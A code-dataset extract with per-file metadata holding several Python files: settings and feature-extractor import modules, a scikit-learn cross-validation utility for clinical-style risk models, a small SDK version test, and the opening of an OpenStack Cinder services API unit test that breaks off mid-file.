| 0.25
| false
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
ed3989bc93b1f579cfd3108001b8800c32023669
| 137
|
py
|
Python
|
pi/settings/__init__.py
|
DebasishMaji/PI
|
e293982cae8f8755d28d7b3de22966dc74759b90
|
[
"Apache-2.0"
] | null | null | null |
pi/settings/__init__.py
|
DebasishMaji/PI
|
e293982cae8f8755d28d7b3de22966dc74759b90
|
[
"Apache-2.0"
] | null | null | null |
pi/settings/__init__.py
|
DebasishMaji/PI
|
e293982cae8f8755d28d7b3de22966dc74759b90
|
[
"Apache-2.0"
] | null | null | null |
from .base_config import *
from .kafka_consumer_config import *
from .kafka_producer_config import *
import sys
sys.path.append("..")
| 15.222222
| 36
| 0.766423
| 19
| 137
| 5.263158
| 0.526316
| 0.36
| 0.32
| 0.42
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131387
| 137
| 8
| 37
| 17.125
| 0.840336
| 0
| 0
| 0
| 0
| 0
| 0.014706
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.8
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
9c1d18eb152df66cdfd901ee75b8fb13a75d4eee
| 13,541
|
py
|
Python
|
utils/crossvalidation.py
|
IA-Cardiologia-husa/KoopaML
|
537b65eb016cfc86b381842928443a2d2badee8f
|
[
"Apache-2.0"
] | null | null | null |
utils/crossvalidation.py
|
IA-Cardiologia-husa/KoopaML
|
537b65eb016cfc86b381842928443a2d2badee8f
|
[
"Apache-2.0"
] | 4
|
2020-03-24T17:46:02.000Z
|
2021-08-23T20:22:34.000Z
|
utils/crossvalidation.py
|
IA-Cardiologia-husa/KoopaML
|
537b65eb016cfc86b381842928443a2d2badee8f
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import pandas as pd
import sklearn.model_selection as sk_ms
import sklearn.utils as sk_u
import sklearn.calibration as sk_cal
import sklearn.linear_model as sk_lm
import time
from .stratifiedgroupkfold import StratifiedGroupKFold
def external_validation_RS(external_data, label, feature_oddratio):
X = external_data
Y = external_data.loc[:,[label]]
Y_prob = pd.Series(0, index=X.index)
for feat in feature_oddratio.keys():
Y_prob += feature_oddratio[feat]*X.loc[:,feat]
#Saved as a list of lists because of compatibility with predict_kfold
tl_pp_dict={"true_label":[list(Y.values.flat)], "pred_prob":[list(Y_prob.values.flat)]}
return tl_pp_dict
def external_validation(external_data, label, features, clf):
X = external_data.loc[:,features]
Y = external_data.loc[:,[label]]
Y_prob = clf.predict_proba(X)[:,1]
#Saved as a list of lists because of compatibility with predict_kfold
tl_pp_dict={"true_label":[list(Y.values.flat)], "pred_prob":[list(Y_prob)]}
return tl_pp_dict
def predict_filter_kfold_ML(data, label, features, filter_function, clf, calibration, seed, cvfolds):
kf = sk_ms.KFold(cvfolds, random_state=seed, shuffle=True)
predicted_probability = []
true_label = []
for train_index, test_index in kf.split(data):
data_train, data_test = data.iloc[train_index], data.iloc[test_index]
X_train = filter_function(data_train).loc[:,features]
Y_train = filter_function(data_train).loc[:,[label]]
X_train = X_train.loc[~Y_train[label].isnull()]
Y_train = Y_train.loc[~Y_train[label].isnull()]
X_test = data_test.loc[:,features]
Y_test = data_test.loc[:,[label]]
if (calibration is None):
clf.fit(X_train, Y_train.values.ravel().astype(int))
calibrated_clf = clf
else:
if hasattr(clf, 'best_estimator_'):
clf.fit(X_train, Y_train.values.ravel().astype(int))
if(calibration == 'isotonic'):
calibrated_clf= sk_cal.CalibratedClassifierCV(clf.best_estimator_, method='isotonic', cv=10)
calibrated_clf.fit(X_train, Y_train.values.ravel().astype(int))
elif(calibration == 'sigmoid'):
calibrated_clf = sk_cal.CalibratedClassifierCV(clf.best_estimator_, method='sigmoid', cv=10)
calibrated_clf.fit(X_train, Y_train.values.ravel().astype(int))
else:
print('Unknown Calibration type')
raise
else:
if(calibration == 'isotonic'):
calibrated_clf = sk_cal.CalibratedClassifierCV(clf, method='isotonic', cv=10)
calibrated_clf.fit(X_train, Y_train.values.ravel().astype(int))
elif(calibration == 'sigmoid'):
calibrated_clf = sk_cal.CalibratedClassifierCV(clf, method='sigmoid', cv=10)
calibrated_clf.fit(X_train, Y_train.values.ravel().astype(int))
try:
Y_prob = calibrated_clf.predict_proba(X_test)
predicted_probability.append(Y_prob[:,1])
except:
Y_prob = calibrated_clf.decision_function(X_test)
predicted_probability.append(Y_prob)
true_label.append(list(Y_test.values.flat))
tl_pp_dict={"true_label":true_label, "pred_prob":predicted_probability}
return tl_pp_dict
def predict_filter_kfold_RS(data, label, features, filter_function, feature_oddratio, seed, cvfolds):
kf = sk_ms.KFold(cvfolds, random_state=seed, shuffle=True)
predicted_probability = []
true_label = []
for train_index, test_index in kf.split(data):
data_train, data_test = data.iloc[train_index], data.iloc[test_index]
X_train = filter_function(data_train).loc[:,features]
Y_train = filter_function(data_train).loc[:,[label]]
X_train = X_train.loc[~Y_train[label].isnull()]
Y_train = Y_train.loc[~Y_train[label].isnull()]
X_test = data_test
Y_test = data_test.loc[:,[label]]
Y_prob = pd.Series(0, index=X_test.index)
for feat in feature_oddratio.keys():
Y_prob += feature_oddratio[feat]*X_test.loc[:,feat]
predicted_probability.append(Y_prob)
true_label.append(list(Y_test.values.flat))
tl_pp_dict={"true_label":true_label, "pred_prob":predicted_probability}
return tl_pp_dict
def predict_kfold_ML(data, label, features, cv_type, clf, calibration, seed, cvfolds):
X = data.loc[:,features]
Y = data.loc[:,[label]].astype(bool)
if(cv_type == 'stratifiedkfold'):
skf = sk_ms.StratifiedKFold(cvfolds, random_state=seed, shuffle=True)
elif(cv_type == 'kfold'):
skf = sk_ms.KFold(cvfolds, random_state=seed, shuffle=True)
else:
raise('incompatible crossvalidation type')
predicted_probability = []
true_label = []
for train_index, test_index in skf.split(X,Y):
X_train, X_test = X.iloc[train_index], X.iloc[test_index]
Y_train, Y_test = Y.iloc[train_index], Y.iloc[test_index]
if (calibration is None):
clf.fit(X_train, Y_train.values.ravel().astype(int))
calibrated_clf = clf
else:
if hasattr(clf, 'best_estimator_'):
clf.fit(X_train, Y_train.values.ravel().astype(int))
if(calibration == 'isotonic'):
calibrated_clf= sk_cal.CalibratedClassifierCV(clf.best_estimator_, method='isotonic', cv=10)
calibrated_clf.fit(X_train, Y_train.values.ravel().astype(int))
elif(calibration == 'sigmoid'):
calibrated_clf = sk_cal.CalibratedClassifierCV(clf.best_estimator_, method='sigmoid', cv=10)
calibrated_clf.fit(X_train, Y_train.values.ravel().astype(int))
else:
print('Unknown Calibration type')
raise
else:
if(calibration == 'isotonic'):
calibrated_clf = sk_cal.CalibratedClassifierCV(clf, method='isotonic', cv=10)
calibrated_clf.fit(X_train, Y_train.values.ravel().astype(int))
elif(calibration == 'sigmoid'):
calibrated_clf = sk_cal.CalibratedClassifierCV(clf, method='sigmoid', cv=10)
calibrated_clf.fit(X_train, Y_train.values.ravel().astype(int))
try:
Y_prob = calibrated_clf.predict_proba(X_test)
predicted_probability.append(Y_prob[:,1])
except:
Y_prob = calibrated_clf.decision_function(X_test)
predicted_probability.append(Y_prob)
true_label.append(list(Y_test.values.flat))
tl_pp_dict={"true_label":true_label, "pred_prob":predicted_probability}
return tl_pp_dict
def predict_kfold_RS(data, label, features, cv_type, feature_oddratio, seed, cvfolds):
X = data.loc[:, :]
Y = data.loc[:,[label]].astype(bool)
if(cv_type == 'stratifiedkfold'):
skf = sk_ms.StratifiedKFold(cvfolds, random_state=seed, shuffle=True)
elif(cv_type == 'kfold'):
skf = sk_ms.KFold(cvfolds, random_state=seed, shuffle=True)
else:
raise('incompatible crossvalidation type')
predicted_probability = []
true_label = []
for train_index, test_index in skf.split(X,Y):
X_train, X_test = X.iloc[train_index], X.iloc[test_index]
Y_train, Y_test = Y.iloc[train_index], Y.iloc[test_index]
Y_prob = pd.Series(0, index=X_test.index)
for feat in feature_oddratio.keys():
Y_prob += feature_oddratio[feat]*X_test.loc[:,feat]
predicted_probability.append(list(Y_prob.values.flat))
true_label.append(list(Y_test.values.flat))
tl_pp_dict={"true_label":true_label, "pred_prob":predicted_probability}
return tl_pp_dict
def predict_groupkfold_ML(data, label, features, group_label, cv_type, clf, calibration, seed, cvfolds):
X = data.loc[:,features]
Y = data.loc[:,[label]].astype(bool)
G = data.loc[:, group_label]
if (cv_type == 'stratifiedgroupkfold'):
gkf = StratifiedGroupKFold(cvfolds, random_state=seed, shuffle=True)
elif (cv_type == 'groupkfold'):
X, Y, G = sk_u.shuffle(X,Y,G, random_state=seed)
gkf = sk_ms.GroupKFold(cvfolds)
else:
raise('incompatible crossvalidation type')
predicted_probability = []
true_label = []
for train_index, test_index in gkf.split(X,Y,G):
X_train, X_test = X.iloc[train_index], X.iloc[test_index]
Y_train, Y_test = Y.iloc[train_index], Y.iloc[test_index]
G_train, G_test = G.iloc[train_index], G.iloc[test_index]
if (calibration is None):
try:
clf.fit(X_train, Y_train.values.ravel().astype(int), groups=G_train)
except:
clf.fit(X_train, Y_train.values.ravel().astype(int))
calibrated_clf = clf
else:
if hasattr(clf, 'best_estimator_'):
try:
clf.fit(X_train, Y_train.values.ravel().astype(int), groups=G_train)
except:
clf.fit(X_train, Y_train.values.ravel().astype(int))
if(calibration == 'isotonic'):
calibrated_clf = sk_cal.CalibratedClassifierCV(clf.best_estimator_, method='isotonic', cv=10)
try:
calibrated_clf.fit(X_train, Y_train.values.ravel().astype(int), groups=G_train)
except:
calibrated_clf.fit(X_train, Y_train.values.ravel().astype(int))
elif(calibration == 'sigmoid'):
calibrated_clf = sk_cal.CalibratedClassifierCV(clf.best_estimator_, method='sigmoid', cv=10)
try:
calibrated_clf.fit(X_train, Y_train.values.ravel().astype(int), groups=G_train)
except:
calibrated_clf.fit(X_train, Y_train.values.ravel().astype(int))
else:
print('Unknown Calibration type')
raise
else:
if(calibration == 'isotonic'):
calibrated_clf = sk_cal.CalibratedClassifierCV(clf, method='isotonic', cv=10)
try:
calibrated_clf.fit(X_train, Y_train.values.ravel().astype(int), groups=G_train)
except:
calibrated_clf.fit(X_train, Y_train.values.ravel().astype(int))
elif(calibration == 'sigmoid'):
calibrated_clf = sk_cal.CalibratedClassifierCV(clf, method='sigmoid', cv=10)
try:
calibrated_clf.fit(X_train, Y_train.values.ravel().astype(int), groups=G_train)
except:
calibrated_clf.fit(X_train, Y_train.values.ravel().astype(int))
try:
Y_prob = calibrated_clf.predict_proba(X_test)
predicted_probability.append(Y_prob[:,1])
except:
Y_prob = calibrated_clf.decision_function(X_test)
predicted_probability.append(Y_prob)
true_label.append(list(Y_test.values.flat))
tl_pp_dict={"true_label":true_label, "pred_prob":predicted_probability}
return tl_pp_dict
def predict_groupkfold_RS(data, label, features, group_label, cv_type, feature_oddratio, seed, cvfolds):
X = data.loc[:,:]
Y = data.loc[:,[label]].astype(bool)
G = data.loc[:, group_label]
if (cv_type == 'stratifiedgroupkfold'):
gkf = StratifiedGroupKFold(cvfolds, random_state=seed, shuffle=True)
elif (cv_type == 'groupkfold'):
X, Y, G = sk_u.shuffle(X,Y,G, random_state=seed)
gkf = sk_ms.GroupKFold(cvfolds)
else:
raise('incompatible crossvalidation type')
predicted_probability = []
true_label = []
for train_index, test_index in gkf.split(X,Y,G):
X_train, X_test = X.iloc[train_index], X.iloc[test_index]
Y_train, Y_test = Y.iloc[train_index], Y.iloc[test_index]
Y_prob = pd.Series(0, index=X_test.index)
for feat in feature_oddratio.keys():
Y_prob += feature_oddratio[feat]*X_test.loc[:,feat]
predicted_probability.append(list(Y_prob.values.flat))
true_label.append(list(Y_test.values.flat))
tl_pp_dict={"true_label":true_label, "pred_prob":predicted_probability}
return tl_pp_dict
def predict_kfold_refitted_RS(data, label, features, cv_type, feature_oddratio, seed, cvfolds):
X = data.loc[:, :]
Y = data.loc[:,[label]].astype(bool)
if(cv_type == 'stratifiedkfold'):
skf = sk_ms.StratifiedKFold(cvfolds, random_state=seed, shuffle=True)
elif(cv_type == 'kfold'):
skf = sk_ms.KFold(cvfolds, random_state=seed, shuffle=True)
else:
raise('incompatible crossvalidation type')
predicted_probability = []
true_label = []
lr = sk_lm.LogisticRegression(penalty='none', solver = 'saga')
for train_index, test_index in skf.split(X,Y):
X_train, X_test = X.iloc[train_index], X.iloc[test_index]
Y_train, Y_test = Y.iloc[train_index], Y.iloc[test_index]
X_train = X_train.loc[:,list(feature_oddratio.keys())]
lr.fit(X_train, Y_train.values.ravel().astype(int))
Y_prob = pd.Series(0, index=X_test.index)
n_feat=0
for feat in feature_oddratio.keys():
Y_prob += lr.coef_[0,n_feat]*X_test.loc[:,feat]
n_feat+=1
predicted_probability.append(list(Y_prob.values.flat))
true_label.append(list(Y_test.values.flat))
tl_pp_dict={"true_label":true_label, "pred_prob":predicted_probability}
return tl_pp_dict
def predict_groupkfold_refitted_RS(data, label, features, group_label, cv_type, feature_oddratio, seed, cvfolds):
X = data.loc[:,:]
Y = data.loc[:,[label]].astype(bool)
G = data.loc[:, group_label]
if (cv_type == 'stratifiedgroupkfold'):
gkf = StratifiedGroupKFold(cvfolds, random_state=seed, shuffle=True)
elif (cv_type == 'groupkfold'):
X, Y, G = sk_u.shuffle(X,Y,G, random_state=seed)
gkf = sk_ms.GroupKFold(cvfolds)
else:
raise('incompatible crossvalidation type')
predicted_probability = []
true_label = []
lr = sk_lm.LogisticRegression(penalty='none', solver = 'saga')
for train_index, test_index in gkf.split(X,Y,G):
X_train, X_test = X.iloc[train_index], X.iloc[test_index]
Y_train, Y_test = Y.iloc[train_index], Y.iloc[test_index]
X_train = X_train.loc[:,list(feature_oddratio.keys())]
lr.fit(X_train, Y_train.values.ravel().astype(int))
Y_prob = pd.Series(0, index=X_test.index)
n_feat=0
for feat in feature_oddratio.keys():
Y_prob += lr.coef_[0,n_feat]*X_test.loc[:,feat]
n_feat+=1
predicted_probability.append(list(Y_prob.values.flat))
true_label.append(list(Y_test.values.flat))
tl_pp_dict={"true_label":true_label, "pred_prob":predicted_probability}
return tl_pp_dict
def refitted_oddratios(data, label, feature_oddratio):
X = data.loc[:, list(feature_oddratio.keys())]
Y = data.loc[:,[label]].astype(bool)
lr = sk_lm.LogisticRegression(penalty='none', solver = 'saga')
lr.fit(X, Y.values.ravel().astype(int))
refitted_or = {}
n_feat=0
for feat in feature_oddratio.keys():
refitted_or[feat] = lr.coef_[0,n_feat]
n_feat+=1
return refitted_or
| 34.281013
| 113
| 0.730153
| 2,040
| 13,541
| 4.580882
| 0.060784
| 0.026966
| 0.032959
| 0.057785
| 0.945639
| 0.922525
| 0.916426
| 0.905939
| 0.896201
| 0.888711
| 0
| 0.003645
| 0.128868
| 13,541
| 394
| 114
| 34.36802
| 0.788572
| 0.010044
| 0
| 0.888158
| 0
| 0
| 0.06409
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036184
| false
| 0
| 0.026316
| 0
| 0.098684
| 0.009868
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c25583579cc2009857e973ba54acf7edfb3f456
| 192
|
py
|
Python
|
tests/test_sdk_version_hash.py
|
graphcore/examples-utils
|
8a0ae24893eb2fbf5f41ed71657c0c231b750d4b
|
[
"MIT"
] | null | null | null |
tests/test_sdk_version_hash.py
|
graphcore/examples-utils
|
8a0ae24893eb2fbf5f41ed71657c0c231b750d4b
|
[
"MIT"
] | null | null | null |
tests/test_sdk_version_hash.py
|
graphcore/examples-utils
|
8a0ae24893eb2fbf5f41ed71657c0c231b750d4b
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2022 Graphcore Ltd. All rights reserved.
from examples_utils.sdk_version_hash import sdk_version_hash
def test_sdk_version():
assert isinstance(sdk_version_hash(), str)
| 24
| 60
| 0.796875
| 28
| 192
| 5.142857
| 0.714286
| 0.277778
| 0.291667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.023952
| 0.130208
| 192
| 7
| 61
| 27.428571
| 0.838323
| 0.28125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
9c259e9d9cd12779666921dc5fc1dd3528d9fd06
| 220
|
py
|
Python
|
src/feature_extractor/impl/__init__.py
|
William9923/IF4072-SentimentClassification
|
5e22a6da418056955243c310bab0382e4683b781
|
[
"MIT"
] | null | null | null |
src/feature_extractor/impl/__init__.py
|
William9923/IF4072-SentimentClassification
|
5e22a6da418056955243c310bab0382e4683b781
|
[
"MIT"
] | null | null | null |
src/feature_extractor/impl/__init__.py
|
William9923/IF4072-SentimentClassification
|
5e22a6da418056955243c310bab0382e4683b781
|
[
"MIT"
] | null | null | null |
from src.feature_extractor.impl.vectorspace import CountFeatureExtractor, TFIDFFeatureExtractor
from src.feature_extractor.impl.wordembedding import FastTextFeatureExtractor, BERTFeatureExtractor, RobertaFeatureExtractor
| 110
| 124
| 0.913636
| 19
| 220
| 10.473684
| 0.684211
| 0.070352
| 0.140704
| 0.231156
| 0.271357
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045455
| 220
| 2
| 124
| 110
| 0.947619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
9c330060a15a54ceff8459ce9e0e7a9e76c0d5ad
| 27,145
|
py
|
Python
|
cinder/tests/unit/api/contrib/test_services.py
|
ISCAS-VDI/cinder-base
|
9529102548beef074264aaef31fa8267db99df61
|
[
"Apache-2.0"
] | null | null | null |
cinder/tests/unit/api/contrib/test_services.py
|
ISCAS-VDI/cinder-base
|
9529102548beef074264aaef31fa8267db99df61
|
[
"Apache-2.0"
] | null | null | null |
cinder/tests/unit/api/contrib/test_services.py
|
ISCAS-VDI/cinder-base
|
9529102548beef074264aaef31fa8267db99df61
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2012 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
from iso8601 import iso8601
from oslo_utils import timeutils
import webob.exc
from cinder.api.contrib import services
from cinder.api import extensions
from cinder import context
from cinder import db
from cinder import exception
from cinder import policy
from cinder import test
from cinder.tests.unit.api import fakes
from cinder.tests.unit import fake_constants as fake
fake_services_list = [
{'binary': 'cinder-scheduler',
'host': 'host1',
'availability_zone': 'cinder',
'id': 1,
'disabled': True,
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 2),
'created_at': datetime.datetime(2012, 9, 18, 2, 46, 27),
'disabled_reason': 'test1',
'modified_at': ''},
{'binary': 'cinder-volume',
'host': 'host1',
'availability_zone': 'cinder',
'id': 2,
'disabled': True,
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 5),
'created_at': datetime.datetime(2012, 9, 18, 2, 46, 27),
'disabled_reason': 'test2',
'modified_at': ''},
{'binary': 'cinder-scheduler',
'host': 'host2',
'availability_zone': 'cinder',
'id': 3,
'disabled': False,
'updated_at': datetime.datetime(2012, 9, 19, 6, 55, 34),
'created_at': datetime.datetime(2012, 9, 18, 2, 46, 28),
'disabled_reason': '',
'modified_at': ''},
{'binary': 'cinder-volume',
'host': 'host2',
'availability_zone': 'cinder',
'id': 4,
'disabled': True,
'updated_at': datetime.datetime(2012, 9, 18, 8, 3, 38),
'created_at': datetime.datetime(2012, 9, 18, 2, 46, 28),
'disabled_reason': 'test4',
'modified_at': ''},
{'binary': 'cinder-volume',
'host': 'host2',
'availability_zone': 'cinder',
'id': 5,
'disabled': True,
'updated_at': datetime.datetime(2012, 9, 18, 8, 3, 38),
'created_at': datetime.datetime(2012, 9, 18, 2, 46, 28),
'disabled_reason': 'test5',
'modified_at': datetime.datetime(2012, 10, 29, 13, 42, 5)},
{'binary': 'cinder-volume',
'host': 'host2',
'availability_zone': 'cinder',
'id': 6,
'disabled': False,
'updated_at': datetime.datetime(2012, 9, 18, 8, 3, 38),
'created_at': datetime.datetime(2012, 9, 18, 2, 46, 28),
'disabled_reason': '',
'modified_at': datetime.datetime(2012, 9, 18, 8, 1, 38)},
{'binary': 'cinder-scheduler',
'host': 'host2',
'availability_zone': 'cinder',
'id': 6,
'disabled': False,
'updated_at': None,
'created_at': datetime.datetime(2012, 9, 18, 2, 46, 28),
'disabled_reason': '',
'modified_at': None},
]
class FakeRequest(object):
environ = {"cinder.context": context.get_admin_context()}
GET = {}
# NOTE(uni): deprecating service request key, binary takes precedence
# Still keeping service key here for API compatibility sake.
class FakeRequestWithService(object):
environ = {"cinder.context": context.get_admin_context()}
GET = {"service": "cinder-volume"}
class FakeRequestWithBinary(object):
environ = {"cinder.context": context.get_admin_context()}
GET = {"binary": "cinder-volume"}
class FakeRequestWithHost(object):
environ = {"cinder.context": context.get_admin_context()}
GET = {"host": "host1"}
# NOTE(uni): deprecating service request key, binary takes precedence
# Still keeping service key here for API compatibility sake.
class FakeRequestWithHostService(object):
environ = {"cinder.context": context.get_admin_context()}
GET = {"host": "host1", "service": "cinder-volume"}
class FakeRequestWithHostBinary(object):
environ = {"cinder.context": context.get_admin_context()}
GET = {"host": "host1", "binary": "cinder-volume"}
def fake_service_get_all(context, filters=None):
filters = filters or {}
host = filters.get('host')
binary = filters.get('binary')
return [s for s in fake_services_list
if (not host or s['host'] == host or
s['host'].startswith(host + '@'))
and (not binary or s['binary'] == binary)]
def fake_service_get_by_host_binary(context, host, binary):
for service in fake_services_list:
if service['host'] == host and service['binary'] == binary:
return service
return None
def fake_service_get_by_id(value):
for service in fake_services_list:
if service['id'] == value:
return service
return None
def fake_service_update(context, service_id, values):
service = fake_service_get_by_id(service_id)
if service is None:
raise exception.ServiceNotFound(service_id=service_id)
else:
{'host': 'host1', 'service': 'cinder-volume',
'disabled': values['disabled']}
def fake_policy_enforce(context, action, target):
pass
def fake_utcnow(with_timezone=False):
tzinfo = iso8601.Utc() if with_timezone else None
return datetime.datetime(2012, 10, 29, 13, 42, 11, tzinfo=tzinfo)
class ServicesTest(test.TestCase):
def setUp(self):
super(ServicesTest, self).setUp()
self.stubs.Set(db, "service_get_all", fake_service_get_all)
self.stubs.Set(timeutils, "utcnow", fake_utcnow)
self.stubs.Set(db, "service_get_by_args",
fake_service_get_by_host_binary)
self.stubs.Set(db, "service_update", fake_service_update)
self.stubs.Set(policy, "enforce", fake_policy_enforce)
self.context = context.get_admin_context()
self.ext_mgr = extensions.ExtensionManager()
self.ext_mgr.extensions = {}
self.controller = services.ServiceController(self.ext_mgr)
def test_services_list(self):
req = FakeRequest()
res_dict = self.controller.index(req)
response = {'services': [{'binary': 'cinder-scheduler',
'host': 'host1', 'zone': 'cinder',
'status': 'disabled', 'state': 'up',
'updated_at': datetime.datetime(
2012, 10, 29, 13, 42, 2)},
{'binary': 'cinder-volume',
'host': 'host1', 'zone': 'cinder',
'status': 'disabled', 'state': 'up',
'updated_at': datetime.datetime(
2012, 10, 29, 13, 42, 5)},
{'binary': 'cinder-scheduler',
'host': 'host2',
'zone': 'cinder',
'status': 'enabled', 'state': 'down',
'updated_at': datetime.datetime(
2012, 9, 19, 6, 55, 34)},
{'binary': 'cinder-volume',
'host': 'host2',
'zone': 'cinder',
'status': 'disabled', 'state': 'down',
'updated_at': datetime.datetime(
2012, 9, 18, 8, 3, 38)},
{'binary': 'cinder-volume',
'host': 'host2',
'zone': 'cinder',
'status': 'disabled', 'state': 'down',
'updated_at': datetime.datetime(
2012, 10, 29, 13, 42, 5)},
{'binary': 'cinder-volume',
'host': 'host2',
'zone': 'cinder',
'status': 'enabled', 'state': 'down',
'updated_at': datetime.datetime(
2012, 9, 18, 8, 3, 38)},
{'binary': 'cinder-scheduler',
'host': 'host2',
'zone': 'cinder',
'status': 'enabled', 'state': 'down',
'updated_at': None},
]}
self.assertEqual(response, res_dict)
def test_services_detail(self):
self.ext_mgr.extensions['os-extended-services'] = True
self.controller = services.ServiceController(self.ext_mgr)
req = FakeRequest()
res_dict = self.controller.index(req)
response = {'services': [{'binary': 'cinder-scheduler',
'host': 'host1', 'zone': 'cinder',
'status': 'disabled', 'state': 'up',
'updated_at': datetime.datetime(
2012, 10, 29, 13, 42, 2),
'disabled_reason': 'test1'},
{'binary': 'cinder-volume',
'replication_status': None,
'active_backend_id': None,
'frozen': False,
'host': 'host1', 'zone': 'cinder',
'status': 'disabled', 'state': 'up',
'updated_at': datetime.datetime(
2012, 10, 29, 13, 42, 5),
'disabled_reason': 'test2'},
{'binary': 'cinder-scheduler',
'host': 'host2',
'zone': 'cinder',
'status': 'enabled', 'state': 'down',
'updated_at': datetime.datetime(
2012, 9, 19, 6, 55, 34),
'disabled_reason': ''},
{'binary': 'cinder-volume',
'replication_status': None,
'active_backend_id': None,
'frozen': False,
'host': 'host2',
'zone': 'cinder',
'status': 'disabled', 'state': 'down',
'updated_at': datetime.datetime(
2012, 9, 18, 8, 3, 38),
'disabled_reason': 'test4'},
{'binary': 'cinder-volume',
'replication_status': None,
'active_backend_id': None,
'frozen': False,
'host': 'host2',
'zone': 'cinder',
'status': 'disabled', 'state': 'down',
'updated_at': datetime.datetime(
2012, 10, 29, 13, 42, 5),
'disabled_reason': 'test5'},
{'binary': 'cinder-volume',
'replication_status': None,
'active_backend_id': None,
'frozen': False,
'host': 'host2',
'zone': 'cinder',
'status': 'enabled', 'state': 'down',
'updated_at': datetime.datetime(
2012, 9, 18, 8, 3, 38),
'disabled_reason': ''},
{'binary': 'cinder-scheduler',
'host': 'host2',
'zone': 'cinder',
'status': 'enabled', 'state': 'down',
'updated_at': None,
'disabled_reason': ''},
]}
self.assertEqual(response, res_dict)
def test_services_list_with_host(self):
req = FakeRequestWithHost()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'cinder-scheduler',
'host': 'host1',
'zone': 'cinder',
'status': 'disabled', 'state': 'up',
'updated_at': datetime.datetime(2012, 10,
29, 13, 42, 2)},
{'binary': 'cinder-volume',
'host': 'host1',
'zone': 'cinder',
'status': 'disabled', 'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29,
13, 42, 5)}]}
self.assertEqual(response, res_dict)
def test_services_detail_with_host(self):
self.ext_mgr.extensions['os-extended-services'] = True
self.controller = services.ServiceController(self.ext_mgr)
req = FakeRequestWithHost()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'cinder-scheduler',
'host': 'host1',
'zone': 'cinder',
'status': 'disabled', 'state': 'up',
'updated_at': datetime.datetime(2012, 10,
29, 13, 42, 2),
'disabled_reason': 'test1'},
{'binary': 'cinder-volume',
'frozen': False,
'replication_status': None,
'active_backend_id': None,
'host': 'host1',
'zone': 'cinder',
'status': 'disabled', 'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29,
13, 42, 5),
'disabled_reason': 'test2'}]}
self.assertEqual(response, res_dict)
def test_services_list_with_service(self):
req = FakeRequestWithService()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'cinder-volume',
'host': 'host1',
'zone': 'cinder',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29,
13, 42, 5)},
{'binary': 'cinder-volume',
'host': 'host2',
'zone': 'cinder',
'status': 'disabled',
'state': 'down',
'updated_at': datetime.datetime(2012, 9, 18,
8, 3, 38)},
{'binary': 'cinder-volume',
'host': 'host2',
'zone': 'cinder',
'status': 'disabled',
'state': 'down',
'updated_at': datetime.datetime(2012, 10, 29,
13, 42, 5)},
{'binary': 'cinder-volume',
'host': 'host2',
'zone': 'cinder',
'status': 'enabled',
'state': 'down',
'updated_at': datetime.datetime(2012, 9, 18,
8, 3, 38)}]}
self.assertEqual(response, res_dict)
def test_services_detail_with_service(self):
self.ext_mgr.extensions['os-extended-services'] = True
self.controller = services.ServiceController(self.ext_mgr)
req = FakeRequestWithService()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'cinder-volume',
'replication_status': None,
'active_backend_id': None,
'frozen': False,
'host': 'host1',
